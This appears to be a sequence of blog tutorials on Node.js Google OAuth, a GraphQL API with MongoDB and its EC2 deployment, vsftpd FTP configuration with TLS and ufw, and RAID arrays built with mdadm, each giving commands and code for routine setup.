
Installing Required npm Packages

To implement Google OAuth using node.js, we need to install some npm packages. We will use ‘passport’, ‘express’, ‘path’, and ‘passport-google-oauth20’. Install these packages using npm.

ubuntu@ubuntu:~$ npm install express passport passport-google-oauth20 path

Writing Node.js Code

First of all, we will write two simple HTML web pages: one with a link that authorizes the user when clicked, and a second page that the user is redirected to after successful authorization. Create a file ‘public/index.html’.

<html>

  <head>

    <title>OAuth</title>

  </head>

  <body>

    <a href="/google/auth">Authorize Here</a>

  </body>

</html>

Now create a file ‘public/success.html’ with the following content.

<html>

  <head>

    <title>OAuth</title>

  </head>

  <body>

    <h1>Authorized</h1>

  </body>

</html>

After creating web pages, now we will write code to authorize the users to use google oauth. Create a file ‘index.js’.

// importing required packages
const express = require('express');
const passport = require('passport');
const path = require('path');
const GoogleStrategy = require('passport-google-oauth20').Strategy;

const app = express();

// defining parameters
// client id is the parameter that we will get from the google developer console
const CLIENT_ID = "xxxxxxx";

// client secret will also be taken from the google developer console
const CLIENT_SECRET = "xxxxx";

// user will be redirected to the CALLBACK_URL after authorization
const CALLBACK_URL = "http://localhost:8000/authorized";

// port number must be the same as defined in the developer console
const PORT = 8000;

// configuring passport middleware (note: passport.session() provides persistent
// login sessions only when the express-session middleware is also registered before it)
app.use(passport.initialize());
app.use(passport.session());

passport.serializeUser(function(id, done) {
  done(null, id);
});

passport.deserializeUser(function(id, done) {
  done(null, id);
});

// the following verify function runs whenever passport.authenticate succeeds;
// with five parameters, passport passes (accessToken, refreshToken, params, profile, done)
passport.use(new GoogleStrategy({
    clientID: CLIENT_ID,
    clientSecret: CLIENT_SECRET,
    callbackURL: CALLBACK_URL
  },
  async function(accessToken, refreshToken, params, profile, cb) {
    return cb(null, profile.id);
  }
));

// serving home page for the application
app.get('/', (req, res) => {
  res.sendFile(path.join(__dirname + '/public/index.html'));
});

// serving success page for the application
app.get('/success', (req, res) => {
  res.sendFile(path.join(__dirname + '/public/success.html'));
});

// user will be redirected to the google auth page whenever the '/google/auth' route is hit
app.get('/google/auth',
  passport.authenticate('google', {scope: ['profile', 'email']})
);

// google redirects back to this route; on authentication failure the user is redirected to '/'
app.get('/authorized',
  passport.authenticate('google', {failureRedirect: '/'}),
  (req, res) => {
    res.redirect('/success');
  }
);

// running server
app.listen(PORT, () => {
  console.log("Server is running on Port " + PORT);
});

Testing Google OAuth

Now our application is ready, and we can test whether it authorizes the users using google oauth. Go to the root directory and run the application.

ubuntu@ubuntu:~$ node index.js

Now enter the url of your application into the browser.

http://localhost:8000

It shows the home page with an anchor tag.

When we click on the ‘Authorize Here’, it will redirect to the google oauth page.

Your application name ‘Test’ is displayed on the Google authentication page. When you authorize your account, it will take you to the authorized page.

Conclusion

Managing usernames and passwords for different web applications is not a pleasant task for users. Many users leave your web application without registering an account just because they do not want to manage credentials. The authorization process on your web application or website can be simplified by using third-party services like Google, Facebook, etc. These services authorize users on your application's behalf, so the user does not need to manage credentials separately. In this article, we have implemented the Google OAuth protocol to authorize users using Node.js.

]]>
Introduction to Making GraphQL APIs and Apps in Node.js https://linuxhint.com/graphql-apis-apps-node-js/ Sun, 24 Jan 2021 23:02:11 +0000 https://linuxhint.com/?p=87550

The communication and data transfer between the front end and backend of any application occurs through APIs (Application Programming Interfaces). There are many different types of APIs used for communication between front-end and back-end applications, like RESTful APIs, SOAP APIs, GraphQL APIs, etc. GraphQL is a relatively new technology, and fetching data from the database through a GraphQL API is usually much faster than through a REST API: with GraphQL, the client controls exactly which fields are fetched instead of receiving every detail, which is why GraphQL APIs typically respond faster.

Installing Packages

We will build a node.js application using GraphQL API, so we need to install node.js and npm for this before starting the project.

ubuntu@ubuntu:~$ sudo apt-get update -y

ubuntu@ubuntu:~$ sudo apt-get install nodejs

ubuntu@ubuntu:~$ sudo apt-get install npm

Setting up Project

We will use the ‘express’ framework from node.js to build our application. Create a directory named ‘graphql’ and initiate the project.

ubuntu@ubuntu:~$ mkdir graphql

ubuntu@ubuntu:~$ cd graphql/

ubuntu@ubuntu:~$ npm init -y

MongoDB Setup

In our GraphQL project, we will use MongoDB as our database. MongoDB is a schemaless database and stores data in the form of key-value pairs (JSON-like documents). To install MongoDB, follow the steps below.

Import the public GPG key for MongoDB.

ubuntu@ubuntu:~$ wget -qO - https://www.mongodb.org/static/pgp/server-4.4.asc | sudo apt-key add -


Create the list file for mongodb.

ubuntu@ubuntu:~$ echo "deb [ arch=amd64,arm64 ] https://repo.mongodb.org/apt/ubuntu bionic/mongodb-org/4.4 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list

Update local repositories.

ubuntu@ubuntu:~$ sudo apt-get update -y

Install mongodb package.

ubuntu@ubuntu:~$ sudo apt-get install -y mongodb-org

Start and enable mongod.service.

ubuntu@ubuntu:~$ sudo systemctl start mongod.service

ubuntu@ubuntu:~$ sudo systemctl enable mongod.service

Installing npm Modules

For our GraphQL application, we need to install some npm packages. We will install cors, express, body-parser, mongoose, etc.

ubuntu@ubuntu:~$ cd graphql/

ubuntu@ubuntu:~$ npm install cors express body-parser mongoose --save

To create a GraphQL api, we need to install an extra npm package named ‘apollo-server-express.’ This npm package is used to run graphQL server with all Node.js HTTP frameworks like ‘express.’

ubuntu@ubuntu:~$ npm install apollo-server-express --save

Defining MongoDB Schema

Now we have our environment set up for our GraphQL application in Node.js, and it is time to define a schema for our application. Create a file ‘models/student.js’ in the project root directory.

// defining student schema
const mongoose = require('mongoose');

const studentSchema = new mongoose.Schema({
     name: {
          type: String,
          required: true
     },
     class: {
          type: Number,
          required: true
     },
     major: {
          type: String,
          required: true
     }
}, {
     timestamps: true
});

const Student = mongoose.model('Student', studentSchema);

module.exports = { Student, studentSchema }

In the above-defined schema, every student must have a name, class, and major.

Building GraphQL API

After creating the Student schema, we will now build the GraphQL API. Create a ‘schema.js’ file to hold the GraphQL definitions. There are two parts, ‘typeDefs’ and ‘resolvers’, used in a GraphQL API. In ‘typeDefs’, we specify our schema, the queries (e.g., fetching data, analogous to GET requests), and the mutations (e.g., adding, updating, or deleting data) for that schema. In ‘resolvers’, we write the methods, matching those defined in ‘typeDefs’, that link the queries and mutations with the database.

// importing schema and module
const { gql } = require('apollo-server-express');
const Student = require('./models/student').Student;

// Defining Schema, Query, and Mutation Type
const typeDefs = gql`
   type Student {
      id: ID!,
      name: String!,
      class: Int!,
      major: String!
   }

   type Query {
      getStudents: [Student],
      getStudentById(id: ID!): Student
   }

   type Mutation {
      addStudent( name: String!, class: Int!, major: String! ): Student
      updateStudent( id: ID!, name: String!, class: Int!, major: String! ): Student
      deleteStudent( id: ID! ): Student
   }`

// Defining Resolvers
const resolvers = {
   Query: {
      getStudents: (parent, args) => {
         return Student.find({});
      },
      getStudentById: (parent, args) => {
         return Student.findById(args.id);
      }
   },
   Mutation: {
      addStudent: (parent, args) => {
         let student = new Student({
            name: args.name,
            class: args.class,
            major: args.major
         });
         return student.save();
      },
      updateStudent: (parent, args) => {
         if(!args.id) return;
         return Student.findOneAndUpdate({
            _id: args.id
         },
         {
            $set: {
               name: args.name,
               class: args.class,
               major: args.major
            }
         },
         { new: true }, (err, Student) => {
            if(err) {
               console.log(err);
            } else {};
         })
      }
   }
}

module.exports = {
   typeDefs,
   resolvers
}

Creating GraphQL API Server

Now we are almost done creating the GraphQL Application. The only step left is to create the server. Create a file named ‘app.js’ to configure server parameters.

// importing required packages
const express = require('express');
const mongoose = require('mongoose');
const bodyParser = require('body-parser');
const cors = require('cors');
const { ApolloServer } = require('apollo-server-express');

// importing schema
const { typeDefs, resolvers } = require('./schema');

// connecting to MongoDB
const url = "mongodb://127.0.0.1:27017/students";
const connect = mongoose.connect(url, { useNewUrlParser: true });
connect.then((db) => {
   console.log('Connection Successful');
}, (err) => {
   console.log(err);
});

// creating server
const server = new ApolloServer({
   typeDefs: typeDefs,
   resolvers: resolvers
});

const app = express();
app.use(bodyParser.json());
app.use('*', cors());
server.applyMiddleware({ app });

app.listen(8000, () =>
{
   console.log('listening to 8000');
})

Testing the GraphQL API

We have our GraphQL server up and running on port 8000, and it is time to test the GraphQL API. Open the GraphQL Playground page in the browser by visiting the following URL.

http://localhost:8000/graphql

And it will open the following webpage.


Add the student to the database using graphQL API.


Similarly, add more students, and after adding the student, get all the students using GraphQL API.


Note the ID of any of the Students and get the specific student using its id.
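If you prefer the terminal to the Playground, the same operations can also be exercised with curl against the /graphql endpoint mounted by apollo-server-express. This is a sketch that assumes the server from the previous section is listening on port 8000; the student values are made-up examples, and PASTE_ID_HERE stands for an id returned by an earlier query:

ubuntu@ubuntu:~$ curl -X POST -H "Content-Type: application/json" -d '{"query": "mutation { addStudent(name: \"John\", class: 10, major: \"Math\") { id name } }"}' http://localhost:8000/graphql
ubuntu@ubuntu:~$ curl -X POST -H "Content-Type: application/json" -d '{"query": "{ getStudents { id name class major } }"}' http://localhost:8000/graphql
ubuntu@ubuntu:~$ curl -X POST -H "Content-Type: application/json" -d '{"query": "{ getStudentById(id: \"PASTE_ID_HERE\") { name major } }"}' http://localhost:8000/graphql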

Conclusion

Fetching data from the database using a standard REST API can make queries slow, as we sometimes get more data than required. Using GraphQL, we can fetch exactly the required data, which makes the GraphQL API faster. In this demo project, we only have a single schema, so we have created a GraphQL API for that single schema and defined a handful of queries and mutations for it. You can define additional queries and mutations according to your application's needs.

]]>
How to Deploy GraphQL Application Using Node.js on EC2 Server https://linuxhint.com/deploy-graphql-application-ec2-server/ Wed, 20 Jan 2021 10:06:36 +0000 https://linuxhint.com/?p=86891

GraphQL, also known as Graph Query Language, established and maintained by Facebook, is a query language used for APIs. It is built using JavaScript, Scala, Java, and Ruby programming languages. Its basic purpose is to request data from the server for the client. GraphQL aggregates the data from different sources. Aggregation is the process of filtering data on the server side and then sending the filtered data to the client. Without aggregation, we send all the data to the client, and then the data is filtered at the client side. This makes the system slow, and we can improve the efficiency of an API by using GraphQL. Here we will learn to deploy a simple GraphQL application using node.js on an EC2 server.

Installing Required Packages

The first step to deploy your graphQL application is to ready your server by installing the required packages. Log in to the server using SSH.

ubuntu@ubuntu:~$ ssh ubuntu@IPAdress -i KeyPair.pem

NOTE: Make sure the security group of the instance is configured to allow connections on port 22 and that the private key file has 400 permissions.

Update Ubuntu repositories.

ubuntu@ubuntu:~$ sudo apt-get update -y

Now install node.js and npm on your ubuntu server.

ubuntu@ubuntu:~$ sudo apt-get install nodejs -y
ubuntu@ubuntu:~$ sudo apt-get install npm -y

Verify the installation by checking the version of node.js and npm.

ubuntu@ubuntu:~$ node -v
ubuntu@ubuntu:~$ npm -v

Move GraphQL Application to EC2 Server

The EC2 instance is ready to deploy graphQL applications in node.js. Now we will move our code to the EC2 instance. Two common ways to copy the code to the server are listed below and will be discussed here.

  • Copy code using scp command
  • Clone application code from Github, Gitlab, or Bitbucket

Copy Application Using scp Command

In order to copy your application to the EC2 server using the scp command, first remove the ‘node_modules’ directory from your graphQL application. This directory contains all the npm packages required to run the application; we will install these packages again on the server before starting the graphQL application. Now compress the project directory into a zip file. After creating the zip file, we will move the project zip file to the server. Linux and Windows have different methods to create a zip file.

Windows

In windows, right-click on the application root directory and go to the ‘send to’ option. It will open a submenu. Click on the ‘Compressed (zipped) folder’ to create a zip file of the graphQL application.

Linux or Mac

In Linux or Mac OS, we will use the ‘zip’ command to create a zip file of the project.

ubuntu@ubuntu:~$ zip -r graphQL.zip graphQL

The above command will generate the graphQL.zip file of the graphQL directory.

Upload Application to the Server

Now we have a zip file of our application, and we can upload the zip file to the server by using the scp command.

ubuntu@ubuntu:~$ scp -i KeyPair.pem graphQL.zip ubuntu@IPAddress:~/

The above command will move the project zip file to the remote server’s home directory over the ssh connection. Now on the remote server, unzip the project zip file.

ubuntu@ubuntu:~$ unzip graphQL.zip

Clone Application From Github, Bitbucket or Gitlab

The second method to copy application code to the server is using git. Install git from the command line on the EC2 server.

ubuntu@ubuntu:~$ sudo apt install git

Check the git version to verify the installation.

ubuntu@ubuntu:~$ git --version

If it does not give the version of git, then git is not installed. Now clone the application from GitHub, GitLab, or Bitbucket. Here, we will clone the application code from GitHub.

ubuntu@ubuntu:~$ git clone https://github.com/contentful/the-example-app.nodejs

Starting the GraphQL Application

Now we have our graphQL application on the remote server. Go to the root directory of the graphQL application and install the required npm packages to run the graphQL application.

ubuntu@ubuntu:~$ cd graphQL
ubuntu@ubuntu:~$ sudo npm install

This command will analyze the package.json file in the project and install all the required npm packages. After installing the required packages, now we will start the graphQL application.

ubuntu@ubuntu:~$ node app.js

Running Application as Daemon

When we run the application using the standard method as described above, it runs in the foreground, and the application stops when you close the terminal window. We can run the application as a background process by appending the ampersand (&) sign to the command.

ubuntu@ubuntu:~$ node app.js &

The problem with this method is that when we modify our application code, the changes will not be reflected automatically. We will have to restart the application every time we modify the code for the changes to take effect. In order to run the application in the background and apply changes automatically, we will use an npm package named pm2. Install pm2 on the server.

ubuntu@ubuntu:~$ sudo npm install -g pm2

Start the graphQL application using pm2.

ubuntu@ubuntu:~$ pm2 start app.js --name "graphQL" --watch

The ‘--name’ flag names the background process, and we can start and stop the application using that name. The ‘--watch’ flag keeps checking the application code and applies changes immediately. You can learn more about pm2 by visiting the following link:

https://pm2.keymetrics.io/

Querying GraphQL API from Browser

We can configure our graphQL application to make graphQL queries from the browser manually. For this, we have to create a separate HTTP endpoint on which we will mount the graphQL API server. And this HTTP endpoint will be used to make manual queries. Following is the code to create the graphQL api server endpoint.

const express = require('express');
const { graphqlHTTP } = require('express-graphql');
const { buildSchema } = require('graphql');

const graphQLSchema = buildSchema(`
    type Query{
    message: String
    }`
);

const func = {
    message: () =>
    {
        return 'you are using graphql api server';
    }
};

const server = express();
server.use('/graphql', graphqlHTTP({
    schema: graphQLSchema,
    rootValue: func,
    graphiql: true
}));

server.listen(3000);

Now, after running the server, we can access the graphQL api server on the following route.

http://localhost:3000/graphql

Querying GraphQL API Using CLI

In the previous section, we made graphQL queries from the browser using graphiql. Now we are going to make graphQL queries using the command-line interface in Ubuntu. To make an HTTP POST request from the command line, we will use the curl utility.

ubuntu@ubuntu:~$ curl -X POST -H "Content-Type: application/json" -d '{"query": "{ message }"}' http://localhost:3000/graphql

Querying GraphQL API Programmatically

To make a GraphQL query programmatically, we will use the ‘node-fetch’ module in Node.js. Open the Node.js REPL in the terminal.

ubuntu@ubuntu:~$ node

Now make the HTTP POST request to the server using the ‘node-fetch’ module.
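As a minimal sketch (assuming node-fetch version 2 has been installed in the project directory with npm install node-fetch, and that the server from the previous section is listening on port 3000), the same request can be issued either from the Node.js REPL or as a one-liner from the shell:

ubuntu@ubuntu:~$ node -e "const fetch = require('node-fetch'); fetch('http://localhost:3000/graphql', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ query: '{ message }' }) }).then(res => res.json()).then(data => console.log(data));"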

Conclusion:

GraphQL is an efficient query language, and it can decrease the response time of queries made to the database. Standard API calls to fetch data from the database often include a lot of unneeded data in the response, which increases response time and decreases efficiency. Queries made to the database using GraphQL return only the useful data and hence decrease the response time. In this article, we have deployed our graphQL application on an EC2 instance.

]]>
How to Configure FTP with TLS in Ubuntu https://linuxhint.com/configure-ftp-tls-ubuntu/ Mon, 04 Jan 2021 13:10:42 +0000 https://linuxhint.com/?p=84099

FTP (File Transfer Protocol) is primarily used to transfer files between computers. FTP works in client-server architecture, in which the client asks for a file from the server and the server returns the required file to the client. On the client machine, the FTP client application is used to communicate with the server. It is also possible to access the FTP server on the browser. By default, FTP communicates over an insecure channel, but it is possible to configure FTP to transfer data over a secure channel. In this tutorial, you will learn how to configure an FTP server with TLS and then use FileZilla as a client application to connect with the FTP Server.

Installing VSFTPD

VSFTPD (Very Secure FTP Daemon) is a software program used to configure FTP on a server. In this tutorial, VSFTPD will be used to configure the FTP server on the machine. Before installing VSFTPD, update the repositories in your server by issuing the following command.

ubuntu@ubuntu:~$ sudo apt-get update -y

Next, install VSFTPD using the following command.

ubuntu@ubuntu:~$ sudo apt-get install vsftpd -y

Finally, verify the installation by checking the version of vsftpd with the following command.

ubuntu@ubuntu:~$ vsftpd -v

The above command will output the version of vsftpd if the installation is successful.

FTP in Active Mode

In Active mode, the FTP client starts the session by establishing the TCP control connection from any random port on the client machine to port 21 of the Server. Then, the client starts listening on a random port X for a data connection and informs the server via TCP Control connection that the client is waiting for the data connection on port X. After this, the server establishes a data connection from its port 20 to the port X on the client machine.

A problem can arise where the client is behind a firewall and port X is blocked. In this case, the server is not able to establish a data connection with the client. To avoid this problem, the FTP server is mostly used in Passive mode, which we will discuss later in this article. By default, VSFTPD uses Passive mode, so we will have to change it to Active mode.

First, open the VSFTPD configuration file.

ubuntu@ubuntu:~$ sudo nano /etc/vsftpd.conf

Add the following line to the end of the file.

pasv_enable=NO

Also, be sure that the ‘connect_from_port_20’ option is set to ‘YES.’ This option ensures that the data connection is established on port 20 of the server.
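If that line is missing from /etc/vsftpd.conf, add it explicitly:

connect_from_port_20=YES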

Next, create a directory that the FTP server will use to store files. For this tutorial, we will configure ‘/home/ubuntu/ftp/’ as the root path for the FTP server.

ubuntu@ubuntu:~$ sudo mkdir /home/ubuntu/ftp

Now, specify this directory in the configuration file by changing the ‘local_root’ option. The following parameter will configure the root path of the server.

local_root=/home/ubuntu/ftp

The ‘write_enable’ option must be enabled to allow users to write to the FTP server.
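As with the other options, this is a single line in /etc/vsftpd.conf:

write_enable=YES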

Every time you change the configuration file, always restart the server.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

Setting a Password for a User

The FTP client connects with the server using a username and password. Set the password for your user on the machine using the following command.

ubuntu@ubuntu:~$ sudo passwd ubuntu

The above command will ask for the password for the ‘ubuntu’ user.

Configuring the Firewall for Active Mode

If FTP is used in Active mode, the FTP server will use two ports to communicate with the client, ports 21 and 20. Port 21 is used to pass commands to the client, and port 20 is used to transfer data to any random port of the client. We will use ufw to configure the firewall on the server. Install ufw using the following command.

ubuntu@ubuntu:~$ sudo apt-get install ufw

Now, on the server side, we will open ports 20, 21, and 22 (for the SSH connection).

ubuntu@ubuntu:~$ sudo ufw allow from any to any port 20,21,22 proto tcp

Enable and check the status of ufw using the following commands.

ubuntu@ubuntu:~$ sudo ufw enable

ubuntu@ubuntu:~$ sudo ufw status

NOTE: if you are configuring your FTP server on the cloud, you will also need to allow ports 20, 21, and 22 in the security group.

WARNING: Always allow port 22, along with the other required ports, before enabling ufw on a remote system. By default, ufw blocks all incoming traffic, including port 22, so you will not be able to access your remote server using SSH if you enable ufw without allowing traffic on port 22.

Installing the FTP Client

Now, our server is configured in Active mode, and we can access it from the client side. For the client application, we will use FileZilla, an ftp client application. Install FileZilla using the following command.

ubuntu@ubuntu:~$ sudo apt-get install filezilla -y

Open the FTP client application and enter the public IP address and other credentials of the FTP server.

When you click ‘Quickconnect,’ you will connect to the FTP server and automatically be taken to the directory specified by the ‘local_root’ option in the configuration file, i.e., ‘/home/ubuntu/ftp’.

Problems in Active Mode

Using FTP in Active mode raises problems when the client is behind the firewall. After inputting the initial control commands, when the server creates a data connection with the client on a random port, the port may be blocked by the firewall on the client, causing the data transfer to fail. FTP can be used in Passive mode to resolve these firewall problems.

FTP in Passive Mode

In Passive mode, the client creates a control connection with the server on port 21 of the server. The client then sends the special ‘PASV’ command to inform the server that the data connection will be established by the client instead of the server. In response, the client receives the server IP and random port number (this port number will be configured on the server). The client uses this IP and port number to create a data connection with the server. In Passive mode, both the data and control connections are established by the client, so that the firewall does not disturb the communication between the client and the server.

Open the FTP configuration file in your favorite editor.

ubuntu@ubuntu:~$ sudo nano /etc/vsftpd.conf

Set the ‘pasv_enable’ option to ‘YES’ in the file so that the server can communicate with the client in Passive mode. Also, set the ‘local_root’ option to specify the root directory of the server and set the ‘write_enable’ option to ‘YES’ to allow users to upload files to the server.

As previously discussed, the data connection is established by the client, and the server sends its public IP and a random port to the client to create a data connection. This random port on the server can be specified from a range of ports in the configuration file.
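In vsftpd, this range is defined with the pasv_min_port and pasv_max_port options; for the 1024-1048 range used in this tutorial, the entries in /etc/vsftpd.conf would look like this:

pasv_min_port=1024
pasv_max_port=1048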

The data connection between the server and the client will be established on a port between 1024 and 1048. Restart the FTP server after changing the configuration file.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

Configuring the Firewall in Passive Mode

If we use FTP in Passive mode, the data connection will be established over any port from 1024 to 1048, so it is necessary to allow all these ports on the FTP server.

ubuntu@ubuntu:~$ sudo ufw allow from any to any port 21,22,1024:1048 proto tcp

After allowing all the ports on the firewall, activate the ufw by running the following command.

ubuntu@ubuntu:~$ sudo ufw enable

Always allow the required ports, including port 22, on the server before enabling the firewall; otherwise, you will not be able to access your server via SSH, since ufw blocks all incoming traffic, including port 22, by default.

Testing the Connection

Now, we have set up the FTP server in Passive mode and can check the ftp connection with the client application. Open FileZilla in your system to do so.

After entering the host, username, password, and port, now you can connect with your server. Now that you are connected to the FTP server running in Passive mode, you can upload files to the server.

Configuring SSL Certificates with the FTP Server

By default, the FTP server establishes the connection between the client and the server over an unsecured channel. This type of communication should not be used if you wish to share sensitive data between the client and the server. To communicate over a secure channel, it is necessary to use SSL certificates.

Generating SSL Certificates

We will use SSL certificates to set up secure communication between the client and the server. We will generate these certificates using openssl. The following command will generate SSL certificates for your server.

ubuntu@ubuntu:~$ sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/vsftpd.pem -out /etc/ssl/private/vsftpd.pem

When you run the above command, you will be asked some questions. After you answer these questions, the certificates will be generated. You can check for the certificates in the terminal.

ubuntu@ubuntu:~$ sudo ls /etc/ssl/private/

Using Certificates in the Configuration File

Now, our certificates are ready to use. We will configure the ‘vsftpd.conf’ file to use the SSL certificates for communication. Open the configuration file with the following command.

ubuntu@ubuntu:~$ sudo nano /etc/vsftpd.conf

Add the following lines to the end of the files. These changes will ensure that the FTP server uses the newly generated SSL certificates to communicate securely with the client.

ssl_enable=YES
force_local_data_ssl=NO
force_local_logins_ssl=NO
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
rsa_cert_file=/etc/ssl/private/vsftpd.pem
rsa_private_key_file=/etc/ssl/private/vsftpd.pem

Restart the FTP server to apply these changes.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

After restarting the server, try connecting with your server using the FileZilla client application. This time, the client application will ask you whether to trust these certificates.

If you have certificates from a trusted certificate authority, this warning should not appear. We generated our certificate using openssl, so it is self-signed rather than issued by a trusted certificate authority; that is why the client asked us to verify the certificate in our case. Now, we can communicate between the client and the server over a secure channel.

Anonymous Configuration

You can also enable anonymous login on your FTP server. With this configuration enabled, any user can log into the FTP server with any username and password. The following parameters in the configuration file will make the FTP server accessible anonymously.
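A minimal set of entries for this in /etc/vsftpd.conf (a sketch based on the root path and password behavior described below) would be:

anonymous_enable=YES
no_anon_password=YES
anon_root=/home/ubuntu/ftp/anon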

The above configuration sets the root path for anonymous users to be ‘/home/ubuntu/ftp/anon’ and it will not prompt for the password when an anonymous user logs in.

NOTE: Ensure that the ‘/home/ubuntu/ftp/anon’ path exists on the FTP server.

Now, restart the FTP server.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

After restarting the server, we will try to connect to the server via the Google Chrome Browser. Go to the following URL.

ftp://3.8.12.52

The above URL will take you to the FTP server’s root directory, as specified in the configuration file. With Anonymous login disabled, when you try to connect to the FTP server using a browser, you will first be asked for authentication, and then you will be taken to the root directory of the server.

Configure Local Access

We can also allow or block local access to the FTP server by changing the configuration file. Currently, we can access our FTP server locally without using the FTP client application, but we can block this access. To do so, we must modify the ‘local_enable’ parameter.
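The corresponding entry in /etc/vsftpd.conf to block local logins is:

local_enable=NO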

First, restart the FTP server.

ubuntu@ubuntu:~$ sudo systemctl restart vsftpd

After restarting the server, try to access the FTP server locally by using the command-line interface. Log into your remote server using SSH.

ubuntu@ubuntu:~$ ssh ubuntu@3.8.12.52 -i

Now, issue the following command to log into the FTP server locally using the command-line interface.

ubuntu@ubuntu:~$ ftp localhost

When you run the above command, it will throw a 500 error.

Conclusion

File Transfer Protocol has been used for many years to transfer files and documents over the Internet. VSFTPD is one of the packages used as an FTP server on your machine. VSFTPD contains various configurations that you can use to customize your FTP server. This tutorial showed you how to configure an FTP server with TLS for enhanced security. To learn more about FTP configurations, visit the following link.

http://vsftpd.beasts.org/vsftpd_conf.html

]]>

How to create RAID arrays using MDADM on ubuntu https://linuxhint.com/create-raid-arrays-using-mdadm-ubuntu/ Mon, 28 Dec 2020 08:22:56 +0000 https://linuxhint.com/?p=83412

RAID is a virtualization platform for data storage that integrates several physical disc drives into one or more logical units. Based on the required level of reliability and efficiency, data is scattered across the drives in one of many ways, referred to as RAID levels. Different systems are known as ‘RAID’ followed by an integer, such as RAID 0 or RAID 1. Each system, or level of RAID, provides a different balance between the key goals, i.e. stability, usability, performance, and strength.

RAID uses disc mirroring or disc striping methods; mirroring copies identical data onto more than one drive, while striping distributes data across many disc drives. The storage capacity of each drive is split into units that range from a sector (512 bytes) up to multiple megabytes. RAID levels higher than RAID 0 offer protection against unrecoverable read errors as well as against entire physical drive failures.

RAID devices are deployed via the md device driver. The Linux software RAID implementation currently supports RAID 0 (stripe), RAID 1 (mirror), RAID 4, RAID 5, RAID 6, and RAID 10. Mdadm is a Linux utility used to control and manage RAID devices. Several core operating modes of mdadm are assemble, build, create, follow/monitor, grow, incremental, and auto-detect. The name derives from the multiple device (md) nodes that it controls or manages. Let’s look at creating different kinds of RAID arrays using mdadm.

Creating a RAID 0 array:

RAID 0 is the mechanism by which data is separated into blocks, and those blocks are striped across various storage devices such as hard drives. This means that each disc holds a portion of the data, and several discs are referenced while accessing that data. Because the blocks are striped, RAID 0 performance is excellent, but with no mirroring strategy, a single device failure destroys all the data.

In order to get started, you have to first identify the component devices by using the following command:

ubuntu@ubuntu:~$ lsblk -o NAME,SIZE,TYPE

We have two discs without a filesystem, each 50G in size, as we can see from the output. In this case, the identifiers /dev/ch1 and /dev/ch2 were given to these devices for this session. These are the raw components that we are going to use to create the array.

To use these components to create a RAID 0 array, specify them in the --create command. You will need to define the device name that you want to build (in our case, /dev/mch0), the RAID level, i.e., 0, and the number of devices:

ubuntu@ubuntu:~$ sudo mdadm --create --verbose /dev/mch0 --level=0 --raid-devices=2 /dev/ch1 /dev/ch2

By checking the /proc/mdstat file, we can verify that the RAID array was created successfully:

ubuntu@ubuntu:~$ cat /proc/mdstat

The /dev/mch0 device has been created with the /dev/ch2 and /dev/ch1 devices in the RAID 0 setup. Now create a filesystem on that array using the following command:

ubuntu@ubuntu:~$ sudo mkfs.ext4 -F /dev/mch0

Now, create a mount point and mount the filesystem with the following commands:

ubuntu@ubuntu:~$ sudo mkdir -p /mnt/mch0
ubuntu@ubuntu:~$ sudo mount /dev/mch0 /mnt/mch0

Check if there is any new space available or not:

ubuntu@ubuntu:~$ df -h -x devtmpfs -x tmpfs

Now we have to change the /etc/mdadm/mdadm.conf file to make sure the array is automatically reassembled at boot. The following sequence of commands scans the current arrays, appends them to the file, and updates the initial RAM filesystem:

ubuntu@ubuntu:~$ sudo mdadm --detail --scan | sudo tee -a /etc/mdadm/mdadm.conf
ubuntu@ubuntu:~$ sudo update-initramfs -u

In order to mount the array automatically at boot, add an entry for the new filesystem to the /etc/fstab file, as shown below:
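One way to do this is to append an entry for the new filesystem; the defaults,nofail,discard options shown here are a common illustrative choice, not something this setup strictly requires:

ubuntu@ubuntu:~$ echo '/dev/mch0 /mnt/mch0 ext4 defaults,nofail,discard 0 0' | sudo tee -a /etc/fstab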

Your RAID 0 array will now be assembled and mounted automatically at each boot.

Creating a RAID 5 array:

RAID 5 arrays are created by striping the data across various devices. A calculated parity block is part of each stripe. The parity block and the remaining blocks are used to reconstruct the missing data in case a device fails. The device receiving the parity block is rotated so that each device holds a balanced amount of parity information. While the parity information is distributed, the storage capacity of one disc is used up for parity. When in a degraded state, RAID 5 suffers from very poor performance.

For creating the RAID 5 array, we have to first identify the component devices as we identified in RAID 0. But in RAID 5 we should have at least 3 storage devices. Find the identifiers for these devices by using the following command:

ubuntu@ubuntu:~$ lsblk -o NAME,SIZE,TYPE

Use the --create command to create a RAID 5 array, but use the value 5 for “level” in this case.

ubuntu@ubuntu:~$ sudo mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/sda /dev/sdb /dev/sdc

This can take some time to complete, and the array may be used even during this time. By checking the /proc/mdstat file, you can track the progress of the creation:

ubuntu@ubuntu:~$ cat /proc/mdstat

Now, create and mount the filesystem on the array by executing the following sequence of commands:

ubuntu@ubuntu:~$ sudo mkfs.ext4 -F /dev/md0
ubuntu@ubuntu:~$ sudo mkdir -p /mnt/md0
ubuntu@ubuntu:~$ sudo mount /dev/md0 /mnt/md0

After mounting it, you can confirm whether it is accessible:

ubuntu@ubuntu:~$ df -h -x devtmpfs -x tmpfs

For automatic assembly and mounting of the RAID 5 array at each boot, you have to adjust the initramfs and add the newly created filesystem to the /etc/fstab file by executing the following commands:
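These are the same steps used for the RAID 0 array above, now pointing at /dev/md0 and /mnt/md0 (the fstab mount options are again only an illustrative choice):

ubuntu@ubuntu:~$ sudo mdadm --detail --scan | sudo tee -a /etc/mdadm/mdadm.conf
ubuntu@ubuntu:~$ sudo update-initramfs -u
ubuntu@ubuntu:~$ echo '/dev/md0 /mnt/md0 ext4 defaults,nofail,discard 0 0' | sudo tee -a /etc/fstab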

Conclusion:

RAID provides efficiency and stability by combining multiple hard drives together. In this way, it gives the system one large-capacity drive with much better speed than normal partitioned drives. On the other hand, RAID 0 does not provide redundancy or fault tolerance, and if one drive fails, all of the data is lost.

]]>
How to use LinSSID on Linux for wireless scanning https://linuxhint.com/wireless-scanning-linssid/ Sat, 26 Dec 2020 11:58:53 +0000 https://linuxhint.com/?p=83032

